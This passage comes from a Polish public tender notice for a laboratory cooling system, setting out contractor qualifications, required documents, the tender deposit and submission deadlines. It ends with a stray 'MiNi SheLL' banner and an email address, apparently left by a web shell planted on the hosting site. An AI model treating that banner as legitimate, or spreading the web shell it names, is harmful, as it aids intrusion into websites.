fluorowanych gazach cieplarnianych (t.j. Dz.U. z 2020 poz. 2065).<br/>Zamawiający uznaje certyfikaty, wydane przez inne państwa członkowskie UE, o których mowa w art. 2 ust. 2 rozporządzenia wykonawczego Komisji (UE) 2015/2067 z dnia 17 listopada 2015 r. <br/><br/> W przypadku „certyfikatu przedsiębiorstwa” wydanego przez inne państwo członkowskie <br/> UE zamawiający wymaga, aby wykonawca dostarczył certyfikat z tłumaczeniem na język <br/> polski. <br/><br/> 2. Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności zawodowej <br/> jeżeli wykaże, że <br/><br/> 1) wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania <br/> ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie min. 1 <br/> robotę budowlaną polegającą na wykonaniu instalacji klimatyzacji o wartości nie <br/> mniejszej niż. 50 000,00 złotych brutto.<br/><br/> 2) dysponuje lub będzie dysponował następującymi osobami skierowanymi do realizacji <br/> zamówienia:<br/>a)	osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń<br/>b)	osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w nieograniczonym zakresie<br/> W przypadku warunku zdolności zawodowej, w zakresie dysponowania osobami <br/> skierowanymi przez wykonawcę do realizacji zamówienia publicznego, <br/> odpowiedzialnych za kierowanie robotami budowlanymi, zamawiający uznaje <br/> wymagane uprawnienia do kierowania robotami budowlanymi określone w <br/> rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 06 maja 2019 r. w sprawie <br/> samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz. 831) oraz <br/> uprawnienia obowiązujące wydane na podstawie wcześniej obowiązujących <br/> przepisów prawnych, a także zgodnie z art. 12a ustawy z dnia 7 lipca 1994 r. - Prawo <br/> budowlane (Dz.U.2020.1333 t. j. z dnia 2020.08.03), zamawiający uznaje również <br/> wymagane uprawnienia budowlane do kierowania robotami budowlanymi nabyte w <br/> innych niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, <br/> państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) – <br/> stronach umowy o Europejskim Obszarze Gospodarczym, Konfederacji Szwajcarskiej, <br/> na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania <br/> kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej <br/> (Dz.U.2021.1646 t. j. z dnia 2021.09.08)<br/><br/> 2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub <br/> kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego <br/> zamówienia lub jego części, polegać na zdolnościach technicznych lub zawodowych lub <br/> sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie <br/> od charakteru prawnego łączących go z nimi stosunków prawnych.<br/><br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub <br/> doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających <br/> zasoby, jeśli podmioty te wykonają usługi lub roboty budowlane, do realizacji których te <br/> zdolności są wymagane.<br/><br/>4. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających <br/> zasoby, składa wraz z wnioskiem o dopuszczenie do udziału w postępowaniu albo <br/> odpowiednio wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania <br/> mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub <br/> inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując <br/> zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/><br/>5. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 4 potwierdza, <br/> że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje <br/> rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/><br/>1)	zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>2)	sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>3)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/><br/> 6. Zamawiający ocenia, czy udostępnione Wykonawcy przez podmioty udostępniające <br/> zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub <br/> ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału <br/> w postępowaniu, o których mowa w art. 112 ust. 3 i 4 oraz, jeżeli to dotyczy kryteriów <br/> selekcji, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, <br/> które zostały przewidziane względem wykonawcy.<br/><br/> 7. Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie z <br/> wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę <br/> poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, <br/> chyba, że za nieudostępnienie tych zasobów podmiot ten nie ponosi winy.<br/><br/> 8. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa <br/> podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę <br/> warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy <br/> wykluczenia, zamawiający żąda, aby wykonawca w terminie określonym przez <br/> zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że <br/> samodzielnie spełnia warunki udziału w postępowaniu.<br/><br/> 9. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności <br/> lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie <br/> polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających <br/> zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zamawiający żąda następujących podmiotowych środków dowodowych:<br/> <br/> 1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku <br/> przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 <br/> lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i <br/> 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub <br/> wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o <br/> przynależności do tej samej grupy kapitałowej wraz z dokumentami lub <br/> informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub <br/> wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego <br/> wykonawcy należącego do tej samej grupy kapitałowej; <br/><br/> 2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i <br/> Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, <br/> sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli <br/> przepisy wymagają wpisu do rejestru lub ewidencji; <br/><br/>2.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu o którym mowa w ust. 1 pkt. 2 Wykonawca składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3.	Zgodnie z art. 274 ust. 1 ustawy Pzp, przed wyborem najkorzystniejszej oferty zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych o których mowa w rozdziale IX pkt. 1 i X. <br/>4.	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1, dane umożliwiające dostęp do tych środków;<br/>5.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia warunków udziału w postępowaniu zamawiający żąda:<br/> a) wykazu robót budowlanych wykonanych w okresie ostatnich 5 lat przed upływem <br/> terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym <br/> okresie wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz <br/> podmiotów, na rzecz których roboty zostały wykonane, oraz załączeniem dowodów <br/> określających, czy te roboty budowlane zostały wykonane należycie, przy czym <br/> dowodami , o których mowa , są referencje bądź inne dokumenty sporządzone przez <br/> podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z <br/> przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne <br/> odpowiednie dokumenty – wzór wykazu stanowi Załącznik nr 4 do SWZ<br/><br/> b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/> w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub <br/> kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji <br/> zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania <br/> zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz <br/> informacją o podstawie do dysponowania tymi osobami – wzór wykazu stanowi <br/> Załącznik nr 5 do SWZ.<br/><br/> c) „Certyfikatu przedsiębiorcy”, o którym mowa w art. 29 ustawy z dnia 15.05.2015 r. o <br/> substancjach zubażających warstwę ozonową oraz niektórych fluorowanych gazach <br/> cieplarnianych (t.j. Dz.U. z 2020 poz. 2065).<br/> W przypadku „certyfikatu przedsiębiorstwa” wydanego przez inne państwo członkowskie <br/> UE zamawiający wymaga, aby wykonawca dostarczył certyfikat z tłumaczeniem na język <br/> polski. <br/><br/><br/> 2. Okres wyrażony w latach, o którym mowa w ust. 1 lit. a), liczy się wstecz od dnia, <br/> w którym upływa termin składania ofert.<br/><br/> 3. Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, <br/> wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa w ust. 1 lit. a) <br/> dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio <br/> uczestniczył.<br/><br/> 4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub <br/> doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą <br/> polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do <br/> realizacji których te zdolności są wymagane (art. 117 ust. 3 Pzp).<br/><br/> 5. W przypadku, o którym mowa w ust. 4, wykonawcy wspólnie ubiegający się o udzielenie <br/> zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty <br/> budowlane wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi <br/> Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodowych w postępowaniu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w art. 125 ust. 1<br/>Pzp, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim wykonawca powołuje się na jego zasoby – sporządzone zgodnie z wzorem w Załączniku<br/>2a do SWZ.<br/>2.W przypadku wykonawców składających ofertę wspólną - Oświadczenie wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty budowlane<br/>wykonają poszczególni wykonawcy – w przypadku wspólnego ubiegania się o zamówienie przez<br/>wykonawców. Wzór oświadczenia stanowi Załącznik nr 7 do SWZ.<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>4. Oryginał gwarancji lub poręczenia, w postaci elektronicznej - jeżeli wadium<br/>jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art.<br/>97 ust. 7 pkt 2-4 Pzp,<br/>5. Pełnomocnictwo – jeżeli dotyczy<br/>6. Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub<br/>zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na<br/>zasadach określonych w art. 118 Pzp, przedstawienia podmiotowych środków dowodowych, o<br/>których mowa w rozdziale X ust. 1, dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów<br/>podstawy wykluczenia z postępowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Zamawiający żąda wniesienia wadium w kwocie 1500,00 zł ( słownie: Jeden tysiąc pięćset złotych 00/100). 2.Zgodnie z<br/>art. 97 ust. 7 pkt 2-4 Pzp wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)pieniądzu; 2)gwarancjach bankowych; 3) gwarancjach ubezpieczeniowych; 4)poręczeniach udzielanych przez podmioty, o<br/>których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572). 3. Wadium wnoszone w pieniądzu wpłaca się przelewem na<br/>rachunek bankowy 91 1240 6292 1111 0011 0582 9419. Wniesienie wadium w pieniądzu przelewem na rachunek bankowy<br/>wskazany przez zamawiającego będzie skuteczne z chwilą uznania tego rachunku bankowego kwotą wadium (jeżeli wpływ<br/>środków pieniężnych na rachunek bankowy wskazany przez zamawiającego nastąpi przed upływem terminu składania<br/>ofert). 4.Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp,<br/>wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. 5.W przypadku wadium<br/>wniesionego w pieniądzu oraz z treści gwarancji i poręczeń, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp, jeżeli wadium<br/>będzie wniesione w tych formach, musi wynikać, że wadium zabezpiecza ofertę wykonawcy złożoną w postępowaniu o<br/>udzielenie zamówienia publicznego - Wykonanie systemu chłodzenia w laboratoriach nr 23 oraz 142 . Oznaczenie sprawy:<br/>CRZP/233/009/R/22” . 6.Za zgodą zamawiającego wykonawca może dokonać zmiany formy wadium na jedną lub kilka<br/>form, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp. Zmiana formy wadium musi być dokonana z zachowa¬niem ciągłości<br/>zabezpieczenia oferty kwotą wadium. 7.Zgodnie z art. 96 ust. 6 Pzp zamawiający zatrzymuje wadium wraz z odsetkami, a w<br/>przypadku wadium wniesionego w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp, występuje<br/>odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli:1) wykonawca w odpowiedzi na wezwanie, o<br/>którym mowa w art. 107 ust. 2 lub art. 128 ust. 1 Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków<br/>dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art.<br/>106 ust. 1 Pzp, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, innych dokumentów lub oświadczeń lub nie wyraził<br/>zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 Pzp, co spowodowało brak możliwości wybrania oferty<br/>złożonej przez wykonawcę jako najkorzystniejszej; 2)wykonawca, którego oferta została wybrana:<br/>a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br/>b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy,<br/>którego oferta została wybrana.<br/>8.Z treści gwarancji i poręczeń, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp musi wynikać bezwarunkowe, nieodwołalne i na<br/>pierwsze pisemne żądanie zamawiającego, zobowiązanie gwaranta lub poręczyciela do zapłaty na rzecz zamawiającego<br/>kwoty określonej w gwarancji lub poręczeniu, w okolicznościach, o których mowa w art. 98 ust. 6 Pzp, 9.Gwarancje i<br/>poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp podlegać muszą prawu polskiemu. Wszystkie spory dotyczące<br/>gwarancji i poręczeń, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp będą rozstrzygane zgodnie z prawem polskim przez sądy<br/>polskie. W przypadku, gdy wykonawca wnosi wadium w formie gwarancji lub poręczeń, o których mowa w art. 97 ust. 7 pkt<br/>2-4 Pzp w języku innym niż język polski, dokument gwarancji lub poręczenia należy złożyć wraz z tłumaczeniem na język<br/>polski. Gwarancje i poręczenia podlegać muszą prawu polskiemu, a wszystkie spory odnośnie gwarancji poręczeń będą<br/>rozstrzygane zgodnie z prawem polskim i poddane jurysdykcji sądu właściwego dla siedziby zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, a oferta taka<br/>spełniać musi następujące wymagania:<br/>1) Wykonawcy muszą ustanowić Pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Wypełniając Formularz oferty, oraz inne dokumenty powołujące się na wykonawcę<br/>w miejscu np. „nazwa i adres wykonawcy” należy wpisać dane wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia solidarnie<br/>odpowiadają za podpisanie i wykonanie umowy.<br/>4) W ofercie powinien być podany adres do korespondencji i kontakt telefoniczny z<br/>Pełnomocnikiem wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>5) Przed podpisaniem umowy, wykonawcy składający ofertę wspólną będą mieli<br/>obowiązek przedstawić kopię umowy regulującej ich współpracę.<br/>6) W odniesieniu do wymagań każdy wykonawca składający ofertę wspólną musi<br/>udokumentować, że nie podlega wykluczeniu oraz spełnia warunki udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.<br/>7) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych<br/>lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane, do realizacji których te zdolności są wymagane.<br/>8) W przypadku, o którym mowa w pkt. 7, wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane wykonają poszczególni wykonawcy - Wzór<br/>oświadczenia stanowi załącznik nr 7 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Każda zmiana umowy wymaga formy pisemnej pod rygorem nieważności.<br/>2. Umowa może ulec zmianie na zasadach, o których mowa w art. 454 i 455 ustawy PZP, a<br/>nadto w okolicznościach określonych poniżej.<br/>3. Strony mogą zmienić Umowę w zakresie terminu wykonania Umowy w razie:<br/>a. wstrzymania lub opóźnienia realizacji robót wskutek siły wyższej – o czas, w którym siła wyższa wstrzymała lub opóźniła<br/>realizację robót<br/>b. konieczności wykonania robót/prac dodatkowych lub zamiennych – o czas konieczny na wykonanie tych robót/prac<br/>c. przestojów spowodowanych wyłącznie przez Zamawiającego lub inne niż Wykonawca osoby lub podmioty, za których<br/>działania lub zaniechanie Wykonawca nie ponosi odpowiedzialności – o czas oczekiwania na czynność Zamawiającego,<br/>wskazanych osób lub podmiotów umożliwiającą zakończenie przestoju,<br/>d. wydania odnoszących się do Przedmiotu Umowy decyzji administracyjnych lub wyroków sądowych lub innych władczych<br/>rozstrzygnięć uprawnionych organów lub toczących się ponad terminy ustawowe lub pierwotnie zakładane postępowań<br/>administracyjnych lub innego rodzaju procedur odnoszących się do Przedmiotu Umowy, w tym procedur Zamawiającego – o<br/>czas wstrzymania lub przedłużenia realizacji Umowy wynikającej z tych okoliczności,<br/>e. przestojów spowodowanych koniecznością usuwania nieumyślnych uszkodzeń lub kolizji istniejących urządzeń<br/>podziemnych, nieoznaczonych lub błędnie oznaczonych w dokumentacji projektowej - odpowiednio o liczbę dni wstrzymania<br/>realizacji umowy wynikającej z tych okoliczności,<br/>4. Niezależnie od uprawnień wynikających z ustawy PZP strony mogą zmienić Umowę w<br/>zakresie wysokości wynagrodzenia Wykonawcy lub zasad płatności tego wynagrodzenia w<br/>razie konieczności wykonania robót/prac dodatkowych lub zamiennych, których<br/>konieczność wykonania ujawniła się w toku prowadzenia robót/prac i konieczność ich<br/>wykonania nie dała się przewidzieć przed złożeniem oferty z uwzględnieniem staranności<br/>wymaganej od doświadczonego wykonawcy. Ustalenie zakresu i wartości zmiany następuje<br/>w Protokole Konieczności zgodnie z postanowieniami Umowy oraz w razie takiej<br/>konieczności w Protokole z Negocjacji.<br/>5. Każda zmiana umowy wymaga zgody drugiej strony, z zastrzeżeniem odmiennych postanowień umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć drogą elektroniczną za pośrednictwem Platformy pod adresem: https://platformazakupowa.pl/pn/pg_edu/proceedings na stronie dotyczącej przedmiotowego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-12 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dodatkowe info do: SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA , pkt. 3.6<br/>Ofertę należy złożyć: a) w formie elektronicznej (tj. z kwalifikowanym podpisem elektronicznym)<br/>lub b) w postaci elektronicznej opatrzonej podpisem zaufanym lub c) w postaci elektronicznej<br/>opatrzonej podpisem osobistym podpisaną przez osobę upoważnioną za pośrednictwem<br/>https://platformazakupowa.pl/pn/pg_edu.<br/>Szczegóły zawiera rozdział XVI i XIXSWZ.<br/>Postępowanie ujęte w planie postępowań pod pozycją: 1.1.2

Creat By MiNi SheLL
Email: jattceo@gmail.com